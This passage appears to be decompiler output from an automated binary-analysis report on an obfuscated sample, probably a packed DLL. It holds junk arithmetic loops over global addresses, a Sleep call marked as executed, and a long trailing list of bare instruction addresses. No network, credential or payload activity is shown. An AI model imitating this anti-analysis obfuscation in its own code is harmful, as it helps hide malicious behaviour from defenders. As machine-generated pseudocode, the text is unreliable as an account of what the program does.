					_t725 = _t654 * 0x36 + _t881;
				}
				_t41 = _t725 + 0x11dde; // 0xcf72feeb
				_v40 = 0xbc;
				_t903 = _t41 + _t654;
				_t726 = 0x6e2c5a0e;
				_v32 = _v32 & 0x00000000;
				do {
					if(_t881 != ( *0x6e2c59e2 & 0x0000ffff)) {
						 *_t726 =  *_t726 + _t881;
						_t45 = _t881 + 5; // 0x41f70a6d
						_t654 = _t45 + _t903;
						_t46 = _t881 + 0x3b; // 0x41f70aa3
						_t903 = _t903 + _t46 + _t654;
					}
					_t726 = _t726 - 4;
				} while (_t726 > 0x6e2c59e2);
				_t47 = _t654 + 5; // 0x41f70a72
				_t904 =  *0x6e2c59f2; // 0x1ad7
				_v48 = _t47 + _t903;
				if(_t904 <= _v8) {
					 *0x6e2c59e0 = _t654;
					_v12 = (_t654 & 0x000000ff) * 0x36 + _v8;
				}
				_t848 =  *0x6e2c59e6; // 0x8145
				_t377 = (_t904 & 0x0000ffff) + (_t848 & 0x0000ffff);
				_v56 = _t377;
				if(_t377 != 0x32) {
					_t728 = _t881 * _t654 * 0x10e1d;
					_t380 = _t728 * 0x37;
					__eflags = _t380;
				} else {
					_t380 = _v48;
					_t728 = _t881 - _t654 * _t654 * 0x10e1d + _t380;
				}
				_t658 =  ~_t728 - _t380 * 0x3c;
				_v48 = _t658;
				_t383 = _v44 & 0x0000ffff;
				if(_v56 != 0x32) {
					_t729 = _t383 * _t728 * 0x10e1d;
					_t386 = (_t729 & 0x000000ff) * 0x37;
					__eflags = _t386;
					_v12 = _t386;
				} else {
					_t881 = _v24;
					_t729 = (_v12 & 0x000000ff) - _t728 * _t728 * 0x10e1d + (_v44 & 0x0000ffff);
				}
				_t387 = _t848 & 0x0000ffff;
				_t849 =  *0x6e2c59f0; // 0x90
				_v48 = _t387;
				do {
					if(_t881 == _t387) {
						goto L36;
					}
					_t658 = _t658 * ( *_v28 & 0x0000ffff);
					_t63 = _t658 + 5; // 0x6e2c5a0f
					_t729 = _t63 + _t881;
					if(_t729 == (_t849 & 0x0000ffff)) {
						break;
					}
					_t387 = _v48;
					L36:
					_v28 = _v28 + 2;
				} while (_v28 < 0x6e2c5a44);
				_v48 = _t658;
				if(_v56 != 0x32) {
					_t659 = (_v44 & 0x0000ffff) * _t729 * 0x10e1d;
					__eflags = _t659;
				} else {
					_t659 = (_v12 & 0x000000ff) - _t729 * _t729 * 0x10e1d + (_v44 & 0x0000ffff);
				}
				_t851 = _v16;
				while(1) {
					_t852 = _v48;
					_v44 =  *0x6e2c59e6 & 0x0000ffff;
					_t733 = _t851 - _t852 - 0x54;
					_v32 = _v32 + 1;
					if((_t904 & 0x0000ffff) + _v44 != 0x32) {
						_t659 = (_v8 & 0x0000ffff) * _t659 * 0x10e1d;
						_t733 = (_t659 & 0x000000ff) * 0x37;
						__eflags = _t733;
					} else {
						_t659 = (_t733 & 0x000000ff) - _t659 * _t659 * 0x10e1d + (_v8 & 0x0000ffff);
					}
					 *0x6e2c5a90 = _t659;
					_t854 = 0x3b + _t852 * 2 + _t659;
					_t964 =  *0x6e2c5a04 - 0x1b47; // 0x70
					if(_t964 == 0) {
						_t854 = _t854 + _v44;
						_v16 = _v16 + _t854 * 2 + 0x3b;
					}
					_t905 =  *0x6e2c59f2; // 0x1ad7
					if(_t854 > (_v8 & 0x0000ffff)) {
						_t854 = (_t854 - _t881 * 0x3d - _t659) * _t659 * 0x10e1d;
						_t827 = _t881;
						_v56 = ((_t733 & 0x000000ff) * (_t854 & 0x000000ff) & 0x000000ff) * 0x1d;
						if(_v8 == 0) {
							_t610 = 6;
							_t968 =  *0x6e2c5a02 - _t610; // 0x41f7
							_t611 = _v56;
							if(_t968 != 0) {
								_t881 = _t881 - ((_t611 & 0x000000ff) + _t854) * 0x3d - _t659 + 0xffffff86;
								_v24 = _t881;
								_t827 = _t881;
								 *0x6e2c5a00 = _t881;
							}
						}
						_t905 =  *0x6e2c59f2; // 0x1ad7
						_t733 = _v56;
						_v16 = (_v8 & 0x0000ffff) * 0x36 + _t827;
					}
					_t398 = 0xffffffac;
					_t855 = _t854 + _t398 - _t659;
					_v48 = _t855;
					_t736 = _v16;
					_t402 = ((_t855 & 0x000000ff) * (_t733 & 0x000000ff) & 0x000000ff) * 0x1d;
					_v56 = _t402;
					if(_t736 >= _t855) {
						_v12 = _t736;
						__eflags =  *0x6e2c5a04 - 0x1b47; // 0x70
						_t856 = _t659;
						_t881 = _v24;
						_v16 = _t856;
						_v28 = _t402;
						if(__eflags == 0) {
							_t856 = _v44 + _t659;
							_v28 = _t402;
							_t659 = _t856;
							_v16 = _t856;
							 *0x6e2c5a90 = _t659;
							_v56 = _t402;
							_t736 = _t736 + _t856 * 2 + 0x3b;
							__eflags = _t736;
							_v12 = _t736;
						}
						_t403 = _v28;
					} else {
						_t872 = _t855 + 5 + _t659;
						_v48 = _t872;
						_t600 = ((_t855 & 0x000000ff) * (_t402 & 0x000000ff) & 0x000000ff) * 0x1d;
						_v28 = _t600;
						_t403 = _v28;
						_t736 = _v16 - (_t600 & 0x000000ff) * 0x3d - _t872;
						_v56 = _t403;
						_t856 = _t659;
						_v12 = _t736;
						_v16 = _t856;
					}
					if(_v52 < 1) {
						break;
					}
					_t817 = 0x3b + _v48 * 2 + _t856;
					_v56 = _t817;
					 *0x6e2c5a04 = _v12 + 5 + _t817;
					E6E1FF5C7();
					_t583 =  *0x6e2c5a04; // 0x70
					_t866 = _v12;
					_t904 =  *0x6e2c59f2; // 0x1ad7
					_v2 = _t583;
					_t584 = _t583 & 0x000000ff;
					if(_t866 >= _t584) {
						_t819 = _v56;
						_t904 = _t904 - _t819;
						 *0x6e2c59f2 = _t904;
						_t866 = _t866 - _t584 * 0x3d - _t819;
						_v2 = _t866 - _v2 + _t819;
					}
					_t818 = _v16;
					_t881 =  *0x6e2c5a00; // 0x41f70a68
					_v24 = _t881;
					_v48 = 0x3b + _v56 * 2 + _t818;
					_t851 = _v48 + 0x3b + (_v2 & 0x000000ff) + _t866;
					_v52 = _v52 - 1;
					_v16 = _t851;
					_t593 = _t851 - _t818 - 0x00000054 & 0x0000ffff;
					_v20 = _t593;
					_v8 = _t593;
				}
				_v52 = _t659;
				_t660 = _v12;
				__eflags = _t660 - (_t403 & 0x000000ff);
				if(_t660 < (_t403 & 0x000000ff)) {
					_t661 = _v48;
					_t405 = _v12;
				} else {
					_t661 = _v48;
					_t736 = _t660 - (_v56 & 0x000000ff) * 0x3d - _t661;
					 *0x6e2c59f2 = _t905 - _t661;
					_t405 = _t736;
				}
				_v1 = _t405;
				_v1 = _v1 - _t661;
				_v1 = _v1 - 0x54;
				_v2 = _v1;
				_t858 = _v16;
				__eflags = _t405 - _t661;
				if(_t405 <= _t661) {
					_t406 = _v2;
				} else {
					_t813 = _t736 + 5 + _t661;
					_t923 = 0xffffffac;
					_v1 = _t813;
					_t661 = _t661 + _t923 - _t858;
					_t406 = _t813;
					_v2 = _t406;
					__eflags =  *0x6e2c5a04 - 0x1b47; // 0x70
					if(__eflags == 0) {
						_t881 = _t881 + ( *0x6e2c59e6 & 0x0000ffff);
						_v1 = _t813;
						_t406 = _t813;
						_v24 = _t881;
						_v2 = _t406;
					}
				}
				_t737 = 6;
				__eflags =  *0x6e2c5a02 - _t737; // 0x41f7
				_t738 = _t881;
				if(__eflags == 0) {
					_t906 = _v52;
					_t661 = _t858 + 0x11dde + _t738;
					__eflags = _t661;
					_v2 = _t406;
				} else {
					_t906 = _t858 - _t661 * 0x3d - _t881;
					 *0x6e2c5a90 = _t906;
					_t858 = _t906;
				}
				_t665 =  ~_t858 - _t661 * 0x3c;
				_v12 = _t665;
				__eflags = ".?AV_System_error_category@std@@" - 0x1b47; // 0x56413f2e
				if(__eflags != 0) {
					L73:
					goto L74;
				} else {
					__eflags = "_System_error_category@std@@";
					if("_System_error_category@std@@" != 0) {
						goto L73;
					}
					_t569 =  *0x6e2c5a28; // -21
					_t570 = _t569 + _v1;
					_v2 = _t570;
					_t665 = _t665 + (_t570 & 0x000000ff) * 2 + 0x3b;
					_v12 = _t665;
					L74:
					_t410 = _v2;
					_t883 = _t410 & 0x000000ff;
					_t666 = _t665 + (_t410 & 0x000000ff) + 2;
					__eflags = ( *0x6e2c59f2 & 0x0000ffff) - _t666;
					if(( *0x6e2c59f2 & 0x0000ffff) <= _t666) {
						_t567 = _v8;
						 *0x6e2c59e0 = _t567;
						_t906 = (_t567 & 0x0000ffff) * 0x36 + _t666;
						__eflags = _t906;
						 *0x6e2c5a90 = _t906;
						_t858 = _t906;
					}
					_t414 = 6;
					__eflags =  *0x6e2c5a98 - _t414; // 0x6e26e664
					if(__eflags != 0) {
						L79:
						_t415 = _v12;
						goto L80;
					} else {
						__eflags =  *0x6e2c5a9c;
						if( *0x6e2c5a9c != 0) {
							goto L79;
						}
						_t415 = _t883 + 0x11dde + _t666;
						_v12 = _t415;
						L80:
						_t669 = _t666 - 0x6e2dc204 + 0xdc5379c0;
						_t740 = _t738 + 5 + _t415;
						__eflags = _t740;
						_v16 = _t740;
						 *0x6e2c5a04 = _t740;
						while(1) {
							_t884 = _t906 & 0x0000ffff;
							_v56 = _t884;
							_t885 = _t669 - _v20 + _t884 & 0x0000ffff;
							_t419 = 6;
							_v8 = _t885;
							__eflags =  *0x6e2c5a02 - _t419; // 0x41f7
							if(__eflags == 0) {
								_t885 = _v8;
								_t669 = _v12 + 0x11dde + (_t740 & 0x000000ff);
								__eflags = _t669;
							} else {
								_v16 = _v16 +  ~_v12 - (_t669 & 0x000000ff) * 0x3d;
								_t740 = _v16;
								 *0x6e2c5a04 = _t740;
							}
							_v2 = _v12;
							__eflags = _t669 - 0xffb1;
							if(_t669 > 0xffb1) {
								_v8 = _t669 - _t885 + _v56 & 0x0000ffff;
								_t560 = 6;
								__eflags =  *0x6e2c5a02 - _t560; // 0x41f7
								if(__eflags == 0) {
									_t669 = _v12 + 0x11dde + (_t740 & 0x000000ff);
									__eflags = _t669;
								} else {
									_v16 = _v16 +  ~_v2 - (_t669 & 0x000000ff) * 0x3d;
									_t740 = _v16;
									 *0x6e2c5a04 = _t740;
								}
							}
							__eflags = _v32 - 0x4c;
							if(_v32 < 0x4c) {
								_t892 =  *0x6e2c59f2; // 0x1ad7
								_t698 = (_v8 & 0x0000ffff) * 0x36 + _t858;
								__eflags = ( *0x6e2c59e6 & 0x0000ffff) + (_t892 & 0x0000ffff) - 0x32;
								_t772 = _v16;
								_t544 = _t772 & 0x000000ff;
								if(( *0x6e2c59e6 & 0x0000ffff) + (_t892 & 0x0000ffff) != 0x32) {
									_t740 = ((_v32 & 0x000000ff) * _t544 & 0x000000ff) * 0x1d;
									_t547 = (_t740 & 0x000000ff) * 0x37;
									__eflags = _t547;
									_v12 = _t547;
								} else {
									_t740 = _v32 - ((_t772 & 0x000000ff) * _t544 & 0x000000ff) * 0x1d + _v2;
								}
								_v16 = _t740;
								 *0x6e2c5a04 = _t740;
								_t551 = _t698 - _v56 - 0x00000054 & 0x0000ffff;
								_v8 = _t551;
								_t669 = _t698 - (_t551 & 0x0000ffff) * 0x3d - _t858;
								__eflags = _t669;
							}
							_t886 =  *0x6e2c59f2; // 0x1ad7
							_v52 = _v8 & 0x0000ffff;
							_v56 =  *0x6e2c59e6 & 0x0000ffff;
							__eflags = (_t886 & 0x0000ffff) + _v56 - 0x32;
							if((_t886 & 0x0000ffff) + _v56 != 0x32) {
								_t428 = _t858 * _v24 * 0x10e1d;
								__eflags = _t428;
							} else {
								_t428 = _t669 - _v24 * _v24 * 0x10e1d + _t858;
							}
							__eflags = _v36;
							_v24 = _t428;
							 *0x6e2c5a00 = _t428;
							_t672 = _v52 & 0x0000ffff;
							if(_v36 <= 0) {
								break;
							}
							_t680 = _t672 + 0x11dde + _t858;
							__eflags = _t680 - (_t740 & 0x000000ff);
							if(_t680 >= (_t740 & 0x000000ff)) {
								 *0x6e2c59f2 = _t886 - _v12;
								_t695 = _t680 - (_t740 & 0x000000ff) * 0x3e;
								__eflags = _t695;
								_t740 = _t695;
								_v16 = _t740;
								 *0x6e2c5a04 = _t740;
							}
							_t681 = _v64;
							__eflags = _t681 - 7;
							if(_t681 < 7) {
								_t694 = _t681 - 1;
								_v64 = _t694;
								_t535 = _v24 + 5 + _t694;
								__eflags = _t535;
								_v8 = _t535 & 0x0000ffff;
							}
							_t684 = (_v8 & 0x0000ffff) + 0x11dde + _t858;
							_t450 = 6;
							 *0x6e2c59d0 = _t684;
							__eflags =  *0x6e2c5a02 - _t450; // 0x41f7
							if(__eflags == 0) {
								_t754 = _v12;
								_t669 = _t754 + 0x11dde + (_t740 & 0x000000ff);
								__eflags = _t669;
								 *0x6e2c59d0 = _t669;
							} else {
								_t532 = _v16 +  ~_v12 - (_t684 & 0x000000ff) * 0x3d;
								_t754 = _v12;
								_v16 = _t532;
								 *0x6e2c5a04 = _t532;
							}
							_t888 = _t669;
							__eflags =  *0x6e2c5a04 - 0x1b47; // 0x70
							if(__eflags == 0) {
								_t808 = _t754 + _v56;
								__eflags = _t808;
								_v12 = _t808;
								_t669 = _t888 + 0x3b + _t808 * 2;
								 *0x6e2c59d0 = _t669;
								_t888 = _t669;
							}
							_t456 = _v40 - _v8 + _v24 & 0x0000ffff;
							_v56 = _t456 & 0x0000ffff;
							__eflags = _t456 - 0x8816;
							_v20 = _t456;
							_t757 = _v12;
							_v8 = _t456;
							if(_t456 <= 0x8816) {
								L114:
								_t457 = _v12;
								goto L115;
							} else {
								_t669 = (_t456 & 0x0000ffff) + 0x11dde + _t858;
								_t888 = _t669;
								 *0x6e2c59d0 = _t669;
								__eflags = _v24 - _t757;
								if(_v24 == _t757) {
									_t522 = E6E1FF7A5();
									_t906 =  *0x6e2c5a90; // 0xcf71e0d2
									_t692 = _t522;
									__eflags =  *0x6e2c5a04 - 0x1b47; // 0x70
									if(__eflags == 0) {
										_t528 = _v12 + ( *0x6e2c59e6 & 0x0000ffff);
										_t919 = _t906 + 0x3b;
										__eflags = _t919;
										_v12 = _t528;
										_t906 = _t919 + _t528 * 2;
										 *0x6e2c5a90 = _t906;
									}
									_t524 =  *0x6e2c5a04; // 0x70
									_v16 = _t524;
									_t669 = _t692 +  ~_v12 - (_t524 & 0x000000ff) * 0x3d;
									__eflags = _t669;
									_t757 = _v12;
									 *0x6e2c59d0 = _t669;
									_t888 = _t669;
								}
								_t519 = 6;
								_t858 = _t906;
								__eflags =  *0x6e2c5a02 - _t519; // 0x41f7
								if(__eflags == 0) {
									_t669 = _t757 + 0x11dde + _t858;
									__eflags = _t669;
									 *0x6e2c59d0 = _t669;
									_t888 = _t669;
									goto L114;
								} else {
									_t457 = _v12 +  ~_t858 - _t888 * 0x3d;
									_v12 = _t457;
									L115:
									__eflags = _v36 - 0xb0;
									if(_v36 >= 0xb0) {
										_t863 = _v16;
										_v28 = _v56 & 0x0000ffff;
									} else {
										__eflags = _t888 - _t457;
										if(_t888 >= _t457) {
											 *0x6e2c59f2 =  *0x6e2c59f2 - _t858;
											__eflags =  *0x6e2c59f2;
											 *0x6e2c59d0 = _t888 - _t457 * 0x3d - _t858;
										}
										Sleep(0x71); // executed
										_t513 = _v8 & 0x0000ffff;
										_t669 =  *0x6e2c59d0; // 0x924fae9a
										_t888 = _t669;
										_t863 =  *0x6e2c5a04; // 0x70
										_t906 =  *0x6e2c5a90; // 0xcf71e0d2
										_v28 = _t513;
										_v12 = _t513 + 2 + _t669;
										_t516 =  *0x6e2c5a00; // 0x41f70a68
										_v24 = _t516;
									}
									_t461 = ( *0x6e2c59f2 & 0x0000ffff) + ( *0x6e2c59e6 & 0x0000ffff);
									_t759 = _v28;
									_v56 = _t461;
									__eflags = _t461 - 0x32;
									if(_t461 != 0x32) {
										_t761 = _t759 * _t906 * 0x10e1d;
										_t669 = _t761 * 0x37;
										__eflags = _t669;
										_t888 = _t669;
									} else {
										_t461 = _v56;
										_t761 = _t759 - _t906 * _t906 * 0x10e1d + _t888;
									}
									__eflags = _v40 - 0x10;
									_v28 = _t761;
									if(_v40 >= 0x10) {
										L129:
										_t915 = _v8;
										goto L130;
									} else {
										__eflags = _t461 - 0x32;
										if(_t461 != 0x32) {
											_t500 = _t761 * _v20 * 0x00000e1d & 0x0000ffff;
											_t915 = _t500;
											_v20 = _t500;
											_v8 = _t500;
											_t669 = (_t915 & 0x0000ffff) * 0x37;
											__eflags = _t669;
											_t888 = _t669;
										} else {
											_t798 = _t761 - _v20 * _v20 * 0x00000e1d + _t888 & 0x0000ffff;
											_v20 = _t798;
											_t915 = _t798;
											_v8 = _t798;
										}
										_t793 = _v40 - 1;
										_t502 = 6;
										_v40 = _t793;
										__eflags =  *0x6e2c5a02 - _t502; // 0x41f7
										if(__eflags == 0) {
											_t505 = (_t915 & 0x0000ffff) + 0x11dde + _t793;
											_v24 = _t505;
											 *0x6e2c5a00 = _t505;
											L130:
											_t462 = 6;
											__eflags =  *0x6e2c5a02 - _t462; // 0x41f7
											if(__eflags == 0) {
												_t465 = (_t863 & 0x000000ff) + 0x11dde + (_t915 & 0x0000ffff);
												__eflags = _t465;
											} else {
												_v8 = _t915 +  ~(_t863 & 0x000000ff) - _v12 * 0x3d;
												_v20 = _v8;
												_t465 = _v12;
											}
											__eflags = _t888 - _t465;
											if(_t888 >= _t465) {
												_t494 = _v28;
												_t669 = _t888 - _t465 * 0x3d - _t494;
												 *0x6e2c59f2 =  *0x6e2c59f2 - _t494;
												__eflags =  *0x6e2c59f2;
												_t888 = _t669;
											}
											_t906 = _v36 + _v24 + 2;
											 *0x6e2c5a90 = _t906;
											_v16 = _t906;
											E6E1FF5C7();
											__eflags =  *0x6e2c59f2 - _v8; // 0x1ad7
											_t858 = _t906;
											_t765 =  <=  ? _t906 & 0x0000ffff :  *0x6e2c59e0 & 0x0000ffff;
											_t470 =  *0x6e2c5a00; // 0x41f70a68
											_v36 = _v36 - 1;
											 *0x6e2c59e0 =  <=  ? _t906 & 0x0000ffff :  *0x6e2c59e0 & 0x0000ffff;
											_t766 = _v60;
											_v24 = _t470;
											_v56 = _t470 + _t766;
											__eflags = _t766 - 2;
											if(_t766 >= 2) {
												_t740 =  *0x6e2c5a04; // 0x70
												_t472 = _t740 & 0x000000ff;
												_v16 = _t740;
												__eflags = _t888 - _t472;
												if(_t888 < _t472) {
													goto L144;
												}
												_t477 = _v40;
												 *0x6e2c59f2 =  *0x6e2c59f2 - _t477;
												_t669 = _t888 - _t472 * 0x3d - _t477;
												_t479 = _t477 - _t740 + _t669;
												__eflags = _t479;
												_t740 = _t479;
												 *0x6e2c5a04 = _t740;
												goto L143;
											} else {
												__eflags = ( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) - 0x32;
												if(( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) != 0x32) {
													_t785 = _t858 * _v20 * 0x00000e1d & 0x0000ffff;
													_v8 = _t785;
													_t669 = (_t785 & 0x0000ffff) * 0x37;
													__eflags = _t669;
												} else {
													_t785 = _t858 - _v20 * _v20 * 0x00000e1d + _t888 & 0x0000ffff;
												}
												_t486 = _v60 - 1;
												_v60 = _t486;
												_t740 =  *0x6e2c5a04; // 0x70
												_v20 = _t486 * _t785 * 0x00000e1d & 0x0000ffff;
												L143:
												_v16 = _t740;
												L144:
												_v12 = (_v56 + 5) * 0x654ae;
												continue;
											}
										} else {
											_t508 = _v20 +  ~_t793 - _v24 * 0x3d;
											__eflags = _t508;
											_v20 = _t508;
											_v8 = _t508;
											goto L129;
										}
									}
								}
							}
						}
						_t908 = _t672 + 0x11dde + _t858;
						_t674 = _t672 - _v68 - 0x54;
						_v64 = _t674;
						__eflags = ( *0x6e2c59e6 & 0x0000ffff) + (_t886 & 0x0000ffff) - 0x32;
						_t743 = _v16;
						_t431 = _t743 & 0x000000ff;
						if(( *0x6e2c59e6 & 0x0000ffff) + (_t886 & 0x0000ffff) != 0x32) {
							_t675 = ((_t674 & 0x000000ff) * _t431 & 0x000000ff) * 0x1d;
							_t858 = (_t675 & 0x000000ff) * 0x37;
							__eflags = _t858;
							_t434 = _v64;
							 *0x6e2c5a90 = _t858;
						} else {
							_t434 = _v64;
							_t675 = _t858 - ((_t743 & 0x000000ff) * _t431 & 0x000000ff) * 0x1d + _t434;
						}
						 *0x6e2c5a04 = _t675;
						_v8 = _t434 + _v68 + _v8 + 0x3b;
						_t437 = 6;
						__eflags =  *0x6e2c5a02 - _t437; // 0x41f7
						if(__eflags == 0) {
							_t440 = _t858 - 0x22 + _v8;
							__eflags = _t440;
							 *0x6e2c5a04 = _t440;
						} else {
							_t858 = _t858 - (_t675 & 0x000000ff) * 0x3d - (_v8 & 0x0000ffff);
							 *0x6e2c5a90 = _t858;
						}
						 *0x6e2c59d0 = _t908 - _t858 - 0x54;
						_t441 = E6E1FF218(_t675, _t908 - _t858 - 0x54);
						_t748 =  *0x6e2c59d0; // 0x924fae9a
						_t910 = _t748 + 0x0000248e & 0x0000ffff;
						__eflags = ( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) - 0x32;
						if(( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) != 0x32) {
							_t912 = _t910 * _t441 * 0x10e1d;
							__eflags = _t912;
						} else {
							_t912 = _t910 - _t441 * _t441 * 0x10e1d + 0x6b0;
						}
						 *0x6e2c5a90 = _t912;
						return  *0x6e2c5a04 & 0x000000ff;
					}
				}
			}

0x6e1ffb4d
0x6e1ffb52
0x6e1ffb59
0x6e1ffb6b
0x6e1ffb76
0x6e1ffb7d
0x6e1ffb8f
0x6e1ffb93
0x6e1ffb98
0x6e1ffb9d
0x6e1ffba3
0x6e1ffbaa
0x6e1ffbb0
0x6e1ffbb7
0x6e1ffbc0
0x6e1ffbc4
0x6e1ffbc6
0x6e1ffbca
0x6e1ffbcc
0x00000000
0x00000000
0x6e1ffbd1
0x6e1ffbd4
0x6e1ffbde
0x6e1ffbe0
0x6e1ffbe8
0x00000000
0x00000000
0x6e1ffbea
0x6e1ffbea
0x6e1ffbed
0x6e1ffc03
0x6e1ffc09
0x6e1ffc0d
0x6e1ffc17
0x6e1ffc1e
0x6e1ffc20
0x6e1ffc25
0x6e1ffc2f
0x6e1ffc34
0x6e1ffc38
0x6e1ffc42
0x6e1ffc42
0x6e1ffc49
0x6e1ffc4e
0x6e1ffc5c
0x6e1ffc69
0x6e1ffc77
0x6e1ffc7e
0x6e1ffc9f
0x6e1ffca5
0x6e1ffca5
0x6e1ffc80
0x6e1ffc80
0x6e1ffc92
0x6e1ffc92
0x6e1ffca8
0x6e1ffcb0
0x6e1ffcb5
0x6e1ffcbb
0x6e1ffcc2
0x6e1ffcc6
0x6e1ffccd
0x6e1ffcd0
0x6e1ffcd4
0x6e1ffce0
0x6e1ffce7
0x6e1ffceb
0x6e1ffcf5
0x6e1ffcf5
0x6e1ffcfd
0x6e1ffd01
0x6e1ffd15
0x6e1ffd1a
0x6e1ffd1f
0x6e1ffd26
0x6e1ffd2a
0x6e1ffd33
0x6e1ffd37
0x6e1ffd39
0x00000000
0x00000000
0x6e1ffd3e
0x6e1ffd41
0x6e1ffd4b
0x6e1ffd4f
0x00000000
0x00000000
0x6e1ffd51
0x6e1ffd51
0x6e1ffd54
0x6e1ffd61
0x6e1ffd67
0x6e1ffd6b
0x6e1ffd75
0x6e1ffd78
0x6e1ffd79
0x6e1ffd80
0x6e1ffd9d
0x6e1ffda3
0x6e1ffda3
0x6e1ffda5
0x6e1ffda9
0x6e1ffd82
0x6e1ffd82
0x6e1ffd8d
0x6e1ffd95
0x6e1ffd95
0x6e1ffdb1
0x6e1ffdbf
0x6e1ffdc2
0x6e1ffdc6
0x6e1ffdcd
0x6e1ffdd1
0x6e1ffdd6
0x6e1ffdde
0x6e1ffde6
0x6e1ffdeb
0x6e1ffdee
0x6e1ffdf6
0x6e1ffdf8
0x6e1ffe09
0x6e1ffe0b
0x6e1ffe0f
0x6e1ffe17
0x6e1ffe1c
0x6e1ffe23
0x6e1ffe23
0x6e1ffe25
0x6e1ffe2b
0x6e1ffe33
0x6e1ffe35
0x6e1ffe3a
0x6e1ffe3f
0x6e1ffe48
0x6e1ffe4a
0x6e1ffe4d
0x6e1ffe50
0x6e1ffe52
0x6e1ffe57
0x6e1ffe57
0x6e1ffe59
0x6e1ffe5c
0x6e1ffe64
0x6e1ffe69
0x6e1ffe70
0x6e1ffe79
0x6e1ffe81
0x6e1ffe8c
0x6e1ffe8c
0x6e1ffe90
0x6e1ffe9d
0x6e1ffe9f
0x6e1ffea6
0x6e1ffec2
0x6e1ffec8
0x6e1ffec8
0x6e1ffea8
0x6e1ffeb5
0x6e1ffeb9
0x6e1ffeb9
0x6e1ffed2
0x6e1ffedd
0x6e1ffee1
0x6e1ffee4
0x6e1fff0a
0x6e1fff13
0x6e1fff13
0x6e1fff16
0x6e1ffee6
0x6e1ffeff
0x6e1fff03
0x6e1fff03
0x6e1fff1a
0x6e1fff1d
0x6e1fff24
0x6e1fff28
0x6e1fff2a
0x00000000
0x00000000
0x6e1fff33
0x6e1fff39
0x6e1fff3c
0x6e1fff40
0x00000000
0x00000000
0x6e1fff42
0x6e1fff46
0x6e1fff46
0x6e1fff4b
0x6e1fff5a
0x6e1fff5e
0x6e1fff87
0x6e1fff87
0x6e1fff60
0x6e1fff79
0x6e1fff79
0x6e1fff8d
0x6e1fff91
0x6e1fff9a
0x6e1fffa0
0x6e1fffa4
0x6e1fffa7
0x6e1fffb5
0x6e1fffdd
0x6e1fffe6
0x6e1fffe6
0x6e1fffb7
0x6e1fffd1
0x6e1fffd1
0x6e1ffff0
0x6e1ffffb
0x6e1ffffd
0x6e200004
0x6e200006
0x6e200014
0x6e200014
0x6e20001d
0x6e200026
0x6e200035
0x6e200044
0x6e20004f
0x6e200053
0x6e200057
0x6e200058
0x6e20005f
0x6e200063
0x6e200071
0x6e200074
0x6e200078
0x6e20007a
0x6e20007a
0x6e200063
0x6e200085
0x6e200091
0x6e200095
0x6e200095
0x6e20009b
0x6e20009e
0x6e2000a9
0x6e2000b0
0x6e2000b4
0x6e2000b7
0x6e2000bd
0x6e200102
0x6e200106
0x6e20010d
0x6e20010f
0x6e200113
0x6e200117
0x6e20011b
0x6e200121
0x6e200123
0x6e200127
0x6e200129
0x6e20012d
0x6e200133
0x6e20013a
0x6e20013a
0x6e20013d
0x6e20013d
0x6e200141
0x6e2000bf
0x6e2000cb
0x6e2000cd
0x6e2000d8
0x6e2000db
0x6e2000e7
0x6e2000eb
0x6e2000ed
0x6e2000f1
0x6e2000f3
0x6e2000f7
0x6e2000f7
0x6e20014a
0x00000000
0x00000000
0x6e20015f
0x6e200165
0x6e200169
0x6e20016e
0x6e200173
0x6e200178
0x6e20017c
0x6e200183
0x6e200187
0x6e20018c
0x6e20018e
0x6e200192
0x6e200198
0x6e2001a1
0x6e2001ab
0x6e2001ab
0x6e2001b3
0x6e2001b7
0x6e2001bd
0x6e2001ca
0x6e2001dc
0x6e2001de
0x6e2001e4
0x6e2001ed
0x6e2001f0
0x6e2001f4
0x6e2001f4
0x6e2001fd
0x6e200201
0x6e200208
0x6e20020a
0x6e20022e
0x6e200232
0x6e20020c
0x6e200212
0x6e20021e
0x6e200223
0x6e20022a
0x6e20022a
0x6e200236
0x6e20023a
0x6e20023e
0x6e200247
0x6e20024b
0x6e20024f
0x6e200251
0x6e200290
0x6e200253
0x6e200258
0x6e20025a
0x6e20025d
0x6e200261
0x6e200263
0x6e20026a
0x6e20026e
0x6e200275
0x6e20027e
0x6e200280
0x6e200284
0x6e200286
0x6e20028a
0x6e20028a
0x6e200275
0x6e200296
0x6e200297
0x6e20029e
0x6e2002a0
0x6e2002b5
0x6e2002bf
0x6e2002bf
0x6e2002c1
0x6e2002a2
0x6e2002a9
0x6e2002ab
0x6e2002b1
0x6e2002b1
0x6e2002cc
0x6e2002d3
0x6e2002d7
0x6e2002dd
0x6e200308
0x00000000
0x6e2002df
0x6e2002df
0x6e2002e6
0x00000000
0x00000000
0x6e2002e8
0x6e2002ed
0x6e2002f1
0x6e2002ff
0x6e200302
0x6e20030c
0x6e20030c
0x6e200310
0x6e200319
0x6e200322
0x6e200324
0x6e200326
0x6e20032b
0x6e200337
0x6e200337
0x6e200339
0x6e20033f
0x6e20033f
0x6e200343
0x6e200344
0x6e20034a
0x6e200363
0x6e200363
0x00000000
0x6e20034c
0x6e20034c
0x6e200353
0x00000000
0x00000000
0x6e20035b
0x6e20035d
0x6e200367
0x6e200376
0x6e20037c
0x6e20037c
0x6e20037e
0x6e200382
0x6e200388
0x6e200388
0x6e200393
0x6e200397
0x6e20039c
0x6e20039d
0x6e2003a1
0x6e2003a8
0x6e2003cc
0x6e2003d9
0x6e2003d9
0x6e2003aa
0x6e2003b8
0x6e2003bc
0x6e2003c0
0x6e2003c0
0x6e2003df
0x6e2003e3
0x6e2003e9
0x6e2003f8
0x6e2003fc
0x6e2003fd
0x6e200404
0x6e200431
0x6e200431
0x6e200406
0x6e200414
0x6e200418
0x6e20041c
0x6e20041c
0x6e200404
0x6e200433
0x6e200438
0x6e20043f
0x6e200455
0x6e200457
0x6e20045a
0x6e20045e
0x6e200461
0x6e200488
0x6e20048e
0x6e20048e
0x6e200491
0x6e200463
0x6e200475
0x6e200475
0x6e200497
0x6e2004a2
0x6e2004a8
0x6e2004ab
0x6e2004b7
0x6e2004b7
0x6e2004b7
0x6e2004be
0x6e2004c5
0x6e2004d0
0x6e2004db
0x6e2004de
0x6e2004fb
0x6e2004fb
0x6e2004e0
0x6e2004ef
0x6e2004ef
0x6e200501
0x6e200506
0x6e20050a
0x6e200513
0x6e200516
0x00000000
0x00000000
0x6e200525
0x6e200527
